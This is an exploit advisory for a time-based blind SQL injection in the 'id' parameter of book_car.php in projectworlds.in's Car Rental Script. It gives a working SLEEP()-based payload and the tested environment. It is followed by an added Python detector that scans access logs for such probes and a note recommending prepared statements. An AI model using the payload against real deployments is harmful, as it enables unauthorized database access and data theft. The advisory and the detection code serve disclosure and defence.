Car Rental Script SQL Injection

Car Rental Script from projectworlds.in suffers from a remote SQL injection vulnerability. Versions are not provided with this software currently.


MD5 | 2e01a55b635c9bfb17fe3f6b96de3983

====================================================================
Car Rental Script - Time-based blind SQL injection
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date : 8/8/2020
.:. Tested on : Windows 10 64-bit || XAMPP
####################################################################


===[ Exploit ]===

[*] SQL injection
=================================

https://localhost/testing/book_car.php?id='[payload]


Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu


Back-end DBMS: MySQL; web application technology: PHP 7.2.32, Apache 2.4.43
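As an added detection example (not part of the original advisory or the vendor's code), the following scans Apache access-log lines for the time-based probe shape reported above: a query parameter whose decoded value calls SLEEP() or BENCHMARK(). The log lines are constructed; the IPs, timestamps and the /testing/ path are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not real traffic). The second
# request carries the SLEEP() payload reported for book_car.php?id=.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Aug/2020:10:00:01 +0000] "GET /testing/book_car.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Aug/2020:10:00:07 +0000] "GET /testing/book_car.php?id=%27%20AND%20%28SELECT%204182%20FROM%20%28SELECT%28SLEEP%285%29%29%29dQXQ%29%20AND%20%27CYlu%27%3D%27CYlu HTTP/1.1" 200 5120 "-" "sqlmap/1.4"
10.0.0.5 - - [08/Aug/2020:10:00:09 +0000] "GET /testing/index.php HTTP/1.1" 200 3010 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp,
# method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# MySQL delay functions used by time-based blind probes; the sqlmap
# payload on this page nests SLEEP(5) inside a subquery.
TIME_BASED_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)


def decode_params(url: str) -> dict:
    """Return the query parameters of a request target, percent-decoded."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def find_time_based_probes(log_text: str) -> list:
    """Return (ip, path, param, decoded_value) for every request whose
    query parameter contains a SLEEP()/BENCHMARK() call."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = urlsplit(m["url"]).path
        for param, values in decode_params(m["url"]).items():
            for value in values:
                if TIME_BASED_RE.search(value):
                    hits.append((m["ip"], path, param, value))
    return hits


if __name__ == "__main__":
    for ip, path, param, value in find_time_based_probes(SAMPLE_LOG):
        print(f"{ip} probed {path} via {param}: {value}")
```

This only surfaces probes in retrospect; the remediation for the script itself is to bind `id` as a parameter in a prepared statement rather than concatenating it into the query.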
